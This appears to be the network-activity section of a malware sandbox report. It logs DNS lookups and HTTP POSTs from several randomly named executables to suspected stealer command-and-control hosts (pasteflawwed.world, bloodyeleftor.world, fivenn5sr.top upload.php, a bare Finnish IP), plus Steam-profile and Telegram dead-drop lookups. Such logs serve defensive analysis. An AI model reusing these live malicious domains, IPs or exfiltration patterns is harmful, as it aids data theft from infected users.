                                                            Host: steamcommunity.com
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Content-Type: text/html; charset=UTF-8
                                                            X-Frame-Options: SAMEORIGIN
                                                            Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;
                                                            Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                            Cache-Control: no-cache
                                                            Date: Thu, 20 Feb 2025 14:08:38 GMT
                                                            Content-Length: 35769
                                                            Connection: keep-alive
                                                            Set-Cookie: sessionid=8596975d0510753c126e7209; Path=/; Secure; SameSite=None
                                                            Set-Cookie: steamCountry=GB%7Cdcacbc5cf7f4b2dc1ed43dd213cf0dc5; path=/; secure; HttpOnly; SameSite=None
                                                          • flag-us
                                                            POST
                                                            https://pasteflawwed.world/api
                                                            2b8d02974d.exe
                                                            Remote address:
                                                            172.67.214.11:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=I2794KF553DR5NUY
                                                            Cookie: __cf_mw_byp=Xun2OteQPCnbhcQFZ27UutjeStBpLjnk7BANJpdT4Kc-1740060517-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 1095
                                                            Host: pasteflawwed.world
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:38 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=t7lmlo4fgaqe1kbjcit3k97s6n; expires=Fri, 21 Feb 2025 14:08:38 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s2zk5Z5fPlhi0zdTfIOgVMD7drWckGrBC9pT8zNbUGzl2IWoSm5S6RpsK7iBZ4OjSXuDuQTLcr2yb%2Bdk6Nq4Sf2s3a2lEkMEamtE3XLzu0ZA5W1h9KyXG28UN7Gc98df1Uzc6GU%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f11de7f273859-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=22029&min_rtt=20742&rtt_var=6604&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2860&recv_bytes=1786&delivery_rate=161323&cwnd=246&unsent_bytes=0&cid=9d5d164aacd85639&ts=231&x=0"
                                                          • flag-us
                                                            DNS
                                                            bloodyeleftor.world
                                                            3e0505c684.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            bloodyeleftor.world
                                                            IN A
                                                            Response
                                                            bloodyeleftor.world
                                                            IN A
                                                            104.21.63.231
                                                            bloodyeleftor.world
                                                            IN A
                                                            172.67.172.150
                                                          • flag-us
                                                            POST
                                                            https://pasteflawwed.world/api
                                                            2b8d02974d.exe
                                                            Remote address:
                                                            172.67.214.11:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cookie: __cf_mw_byp=Xun2OteQPCnbhcQFZ27UutjeStBpLjnk7BANJpdT4Kc-1740060517-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 77
                                                            Host: pasteflawwed.world
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:38 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=bs3jk7j7jrjf7lt5325cmn0025; expires=Fri, 21 Feb 2025 14:08:38 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wZzDiqhGKskFWLvtAbqxtmip05aChVTLIjzU0%2FFYWG5g2JYKgvrwgmPg94UKb0LGG5EeoOE52BsqnvdiwmUEC%2FmzS7jtlTTuU3z1IGMrxXnANmJDxAiQ5X%2F3HZqHk3ijBt8abqA%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f11e02f0948cd-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=21770&min_rtt=20553&rtt_var=6270&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2861&recv_bytes=762&delivery_rate=164831&cwnd=247&unsent_bytes=0&cid=6ee5c987bc6ef107&ts=268&x=0"
                                                          • flag-us
                                                            POST
                                                            https://bloodyeleftor.world/api
                                                            5782e13f6e.exe
                                                            Remote address:
                                                            104.21.63.231:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=WJ9VLZ915
                                                            Cookie: __cf_mw_byp=XUdL1L9CIpENy3SXJKAgKNMDXxBWD5fmbCH.e.R1xyo-1740060518-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 1050
                                                            Host: bloodyeleftor.world
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:39 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=7u5t7eies7043ehk32ikgneccs; expires=Fri, 21 Feb 2025 14:08:38 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yCHTYJDcFu5HRMASQ0fQAtzEDmy6PLBvXuoTzwQrLBCNojDZktkyMJo5UYBCse7eIQCmMH99f55fBPyxq9M6%2FBppPyJpvwbQfxhoAFNpKXa4vflUbkpYr%2FBCdhz7UvxaV0zDbowP"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f11e32bc877b7-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=22277&min_rtt=21094&rtt_var=6478&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2865&recv_bytes=1739&delivery_rate=161144&cwnd=250&unsent_bytes=0&cid=2976b52dc2ae036b&ts=179&x=0"
                                                          • flag-us
                                                            POST
                                                            https://bloodyeleftor.world/api
                                                            5782e13f6e.exe
                                                            Remote address:
                                                            104.21.63.231:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cookie: __cf_mw_byp=XUdL1L9CIpENy3SXJKAgKNMDXxBWD5fmbCH.e.R1xyo-1740060518-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 77
                                                            Host: bloodyeleftor.world
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:39 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=hhkhbj9lua7cf81ickg1js7tcp; expires=Fri, 21 Feb 2025 14:08:39 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F24YjVBR6ISNvLd8GZFvStNmZ1d7OAqhQFat%2BYv5od3BX7K14uDVNwdeDwoxEvaF6BOKgPythoIUoppNNVGxBFThBwdUImK8McFOn6aBZCB7caHMH3gEvxs%2FPPnpH9szICJK91Ig"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f11e49948657b-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=21982&min_rtt=20923&rtt_var=6287&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2865&recv_bytes=763&delivery_rate=163987&cwnd=253&unsent_bytes=0&cid=35d01d214f1d20ba&ts=319&x=0"
                                                          • flag-us
                                                            DNS
                                                            t.me
                                                            7aencsM.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            t.me
                                                            IN A
                                                            Response
                                                            t.me
                                                            IN A
                                                            149.154.167.99
                                                          • flag-gb
                                                            GET
                                                            https://steamcommunity.com/profiles/76561199828130190
                                                            7aencsM.exe
                                                            Remote address:
                                                            104.82.234.109:443
                                                            Request
                                                            GET /profiles/76561199828130190 HTTP/1.1
                                                            Host: steamcommunity.com
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Content-Type: text/html; charset=UTF-8
                                                            X-Frame-Options: SAMEORIGIN
                                                            Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;
                                                            Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                            Cache-Control: no-cache
                                                            Date: Thu, 20 Feb 2025 14:08:40 GMT
                                                            Content-Length: 35831
                                                            Connection: keep-alive
                                                            Set-Cookie: sessionid=f2634f6a72633a73a7c9147e; Path=/; Secure; SameSite=None
                                                            Set-Cookie: steamCountry=GB%7Cdcacbc5cf7f4b2dc1ed43dd213cf0dc5; path=/; secure; HttpOnly; SameSite=None
                                                          • flag-us
                                                            DNS
                                                            fivenn5sr.top
                                                            372485f12e.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            fivenn5sr.top
                                                            IN A
                                                            Response
                                                            fivenn5sr.top
                                                            IN A
                                                            45.156.22.254
                                                          • flag-us
                                                            DNS
                                                            fivenn5sr.top
                                                            372485f12e.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            fivenn5sr.top
                                                            IN AAAA
                                                            Response
                                                          • flag-fi
                                                            POST
                                                            http://fivenn5sr.top/v1/upload.php
                                                            372485f12e.exe
                                                            Remote address:
                                                            45.156.22.254:80
                                                            Request
                                                            POST /v1/upload.php HTTP/1.1
                                                            Host: fivenn5sr.top
                                                            Accept: */*
                                                            Content-Length: 462
                                                            Content-Type: multipart/form-data; boundary=------------------------iYqvULYilqheFXc5Hj3kVN
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            server: nginx
                                                            date: Thu, 20 Feb 2025 14:08:40 GMT
                                                            content-type: text/plain; charset=utf-8
                                                            content-length: 2
                                                            x-ratelimit-limit: 30
                                                            x-ratelimit-remaining: 26
                                                            x-ratelimit-reset: 1740062296
                                                            etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                          • flag-fi
                                                            GET
                                                            https://95.217.24.123/
                                                            7aencsM.exe
                                                            Remote address:
                                                            95.217.24.123:443
                                                            Request
                                                            GET / HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                            Host: 95.217.24.123
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Thu, 20 Feb 2025 14:08:41 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-fi
                                                            POST
                                                            https://95.217.24.123/
                                                            7aencsM.exe
                                                            Remote address:
                                                            95.217.24.123:443
                                                            Request
                                                            POST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----z5x4o8qq9hvkfu3ecbiw
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                            Host: 95.217.24.123
                                                            Content-Length: 256
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Thu, 20 Feb 2025 14:08:42 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-us
                                                            DNS
                                                            fivenn5sr.top
                                                            372485f12e.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            fivenn5sr.top
                                                            IN A
                                                            Response
                                                            fivenn5sr.top
                                                            IN A
                                                            45.156.22.254
                                                          • flag-us
                                                            DNS
                                                            fivenn5sr.top
                                                            372485f12e.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            fivenn5sr.top
                                                            IN AAAA
                                                            Response
                                                          • flag-fi
                                                            POST
                                                            http://fivenn5sr.top/v1/upload.php
                                                            372485f12e.exe
                                                            Remote address:
                                                            45.156.22.254:80
                                                            Request
                                                            POST /v1/upload.php HTTP/1.1
                                                            Host: fivenn5sr.top
                                                            Accept: */*
                                                            Content-Length: 45623
                                                            Content-Type: multipart/form-data; boundary=------------------------vood5mF1RjA7dM4SZrgHwb
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            server: nginx
                                                            date: Thu, 20 Feb 2025 14:08:42 GMT
                                                            content-type: text/plain; charset=utf-8
                                                            content-length: 2
                                                            x-ratelimit-limit: 30
                                                            x-ratelimit-remaining: 25
                                                            x-ratelimit-reset: 1740062296
                                                            etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                          • flag-fi
                                                            POST
                                                            https://95.217.24.123/
                                                            7aencsM.exe
                                                            Remote address:
                                                            95.217.24.123:443
                                                            Request
                                                            POST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----jeua1nyuas0zu3e3ectj
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                            Host: 95.217.24.123
                                                            Content-Length: 331
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Thu, 20 Feb 2025 14:08:42 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-fi
                                                            POST
                                                            https://95.217.24.123/
                                                            7aencsM.exe
                                                            Remote address:
                                                            95.217.24.123:443
                                                            Request
                                                            POST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----16fkxtri58yu379z5pz5
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                            Host: 95.217.24.123
                                                            Content-Length: 331
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Thu, 20 Feb 2025 14:08:43 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-fi
                                                            POST
                                                            https://95.217.24.123/
                                                            7aencsM.exe
                                                            Remote address:
                                                            95.217.24.123:443
                                                            Request
                                                            POST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----vsr1689h4o8g4ect2v3e
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                            Host: 95.217.24.123
                                                            Content-Length: 332
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Thu, 20 Feb 2025 14:08:44 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-fi
                                                            POST
                                                            https://95.217.24.123/
                                                            7aencsM.exe
                                                            Remote address:
                                                            95.217.24.123:443
                                                            Request
                                                            POST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----58q9rqqqq1djmyu379r1
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                            Host: 95.217.24.123
                                                            Content-Length: 5145
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Thu, 20 Feb 2025 14:08:45 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-fi
                                                            POST
                                                            https://95.217.24.123/
                                                            7aencsM.exe
                                                            Remote address:
                                                            95.217.24.123:443
                                                            Request
                                                            POST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----2v3wbai5x4ozmymg4oh4
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                            Host: 95.217.24.123
                                                            Content-Length: 331
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Thu, 20 Feb 2025 14:08:45 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-fi
                                                            POST
                                                            https://95.217.24.123/
                                                            7aencsM.exe
                                                            Remote address:
                                                            95.217.24.123:443
                                                            Request
                                                            POST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----jwt2dt2ngvaaaieusr1n
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                            Host: 95.217.24.123
                                                            Content-Length: 489
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Thu, 20 Feb 2025 14:08:46 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-us
                                                            DNS
                                                            fivenn5sr.top
                                                            372485f12e.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            fivenn5sr.top
                                                            IN A
                                                            Response
                                                          • flag-us
                                                            DNS
                                                            fivenn5sr.top
                                                            372485f12e.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            fivenn5sr.top
                                                            IN AAAA
                                                            Response
                                                            fivenn5sr.top
                                                            IN A
                                                            45.156.22.254
                                                          • flag-fi
                                                            POST
                                                            http://fivenn5sr.top/v1/upload.php
                                                            372485f12e.exe
                                                            Remote address:
                                                            45.156.22.254:80
                                                            Request
                                                            POST /v1/upload.php HTTP/1.1
                                                            Host: fivenn5sr.top
                                                            Accept: */*
                                                            Content-Length: 14283
                                                            Content-Type: multipart/form-data; boundary=------------------------rM13StHqPIfbWTbWmC4dyS
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            server: nginx
                                                            date: Thu, 20 Feb 2025 14:08:48 GMT
                                                            content-type: text/plain; charset=utf-8
                                                            content-length: 2
                                                            x-ratelimit-limit: 30
                                                            x-ratelimit-remaining: 24
                                                            x-ratelimit-reset: 1740062296
                                                            etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                          • flag-us
                                                            DNS
                                                            www.google.com
                                                            firefox.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            www.google.com
                                                            IN A
                                                            Response
                                                            www.google.com
                                                            IN A
                                                            142.250.200.4
                                                          • flag-gb
                                                            GET
                                                            https://www.google.com/async/ddljson?async=ntp:2
                                                            chrome.exe
                                                            Remote address:
                                                            142.250.200.4:443
                                                            Request
                                                            GET /async/ddljson?async=ntp:2 HTTP/2.0
                                                            host: www.google.com
                                                            sec-fetch-site: none
                                                            sec-fetch-mode: no-cors
                                                            sec-fetch-dest: empty
                                                            user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
                                                            accept-encoding: gzip, deflate, br
                                                            accept-language: en-US,en;q=0.9
                                                          • flag-gb
                                                            GET
                                                            https://www.google.com/async/newtab_promos
                                                            chrome.exe
                                                            Remote address:
                                                            142.250.200.4:443
                                                            Request
                                                            GET /async/newtab_promos HTTP/2.0
                                                            host: www.google.com
                                                            sec-fetch-site: cross-site
                                                            sec-fetch-mode: no-cors
                                                            sec-fetch-dest: empty
                                                            user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
                                                            accept-encoding: gzip, deflate, br
                                                            accept-language: en-US,en;q=0.9
                                                          • flag-gb
                                                            GET
                                                            https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                            chrome.exe
                                                            Remote address:
                                                            142.250.200.4:443
                                                            Request
                                                            GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/2.0
                                                            host: www.google.com
                                                            x-client-data: COLsygE=
                                                            sec-fetch-site: cross-site
                                                            sec-fetch-mode: no-cors
                                                            sec-fetch-dest: empty
                                                            user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
                                                            accept-encoding: gzip, deflate, br
                                                            accept-language: en-US,en;q=0.9
                                                          • flag-us
                                                            DNS
                                                            ogads-pa.googleapis.com
                                                            chrome.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            ogads-pa.googleapis.com
                                                            IN A
                                                            Response
                                                            ogads-pa.googleapis.com
                                                            IN A
                                                            142.250.178.10
                                                            ogads-pa.googleapis.com
                                                            IN A
                                                            172.217.169.42
                                                            ogads-pa.googleapis.com
                                                            IN A
                                                            216.58.212.202
                                                            ogads-pa.googleapis.com
                                                            IN A
                                                            142.250.187.202
                                                            ogads-pa.googleapis.com
                                                            IN A
                                                            216.58.201.106
                                                            ogads-pa.googleapis.com
                                                            IN A
                                                            142.250.200.10
                                                            ogads-pa.googleapis.com
                                                            IN A
                                                            142.250.180.10
                                                            ogads-pa.googleapis.com
                                                            IN A
                                                            172.217.169.10
                                                            ogads-pa.googleapis.com
                                                            IN A
                                                            142.250.179.234
                                                            ogads-pa.googleapis.com
                                                            IN A
                                                            216.58.213.10
                                                            ogads-pa.googleapis.com
                                                            IN A
                                                            142.250.200.42
                                                            ogads-pa.googleapis.com
                                                            IN A
                                                            216.58.204.74
                                                            ogads-pa.googleapis.com
                                                            IN A
                                                            172.217.169.74
                                                            ogads-pa.googleapis.com
                                                            IN A
                                                            216.58.212.234
                                                            ogads-pa.googleapis.com
                                                            IN A
                                                            172.217.16.234
                                                            ogads-pa.googleapis.com
                                                            IN A
                                                            142.250.187.234
                                                          • flag-gb
                                                            OPTIONS
                                                            https://ogads-pa.googleapis.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData
                                                            chrome.exe
                                                            Remote address:
                                                            142.250.178.10:443
                                                            Request
                                                            OPTIONS /$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData HTTP/2.0
                                                            host: ogads-pa.googleapis.com
                                                            accept: */*
                                                            access-control-request-method: POST
                                                            access-control-request-headers: content-type,x-goog-api-key,x-user-agent
                                                            origin: chrome-untrusted://new-tab-page
                                                            user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
                                                            sec-fetch-mode: cors
                                                            sec-fetch-site: cross-site
                                                            sec-fetch-dest: empty
                                                            accept-encoding: gzip, deflate, br
                                                            accept-language: en-US,en;q=0.9
                                                          • flag-us
                                                            DNS
                                                            apis.google.com
                                                            chrome.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            apis.google.com
                                                            IN A
                                                            Response
                                                            apis.google.com
                                                            IN CNAME
                                                            plus.l.google.com
                                                            plus.l.google.com
                                                            IN A
                                                            142.250.200.14
                                                          • flag-gb
                                                            GET
                                                            https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0
                                                            chrome.exe
                                                            Remote address:
                                                            142.250.200.14:443
                                                            Request
                                                            GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0 HTTP/2.0
                                                            host: apis.google.com
                                                            sec-ch-ua: "Chromium";v="106", "Google Chrome";v="106", "Not;A=Brand";v="99"
                                                            sec-ch-ua-mobile: ?0
                                                            user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            accept: */*
                                                            sec-fetch-site: cross-site
                                                            sec-fetch-mode: no-cors
                                                            sec-fetch-dest: script
                                                            accept-encoding: gzip, deflate, br
                                                            accept-language: en-US,en;q=0.9
                                                          • flag-us
                                                            DNS
                                                            home.fivenn5sr.top
                                                            372485f12e.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            home.fivenn5sr.top
                                                            IN A
                                                            Response
                                                            home.fivenn5sr.top
                                                            IN A
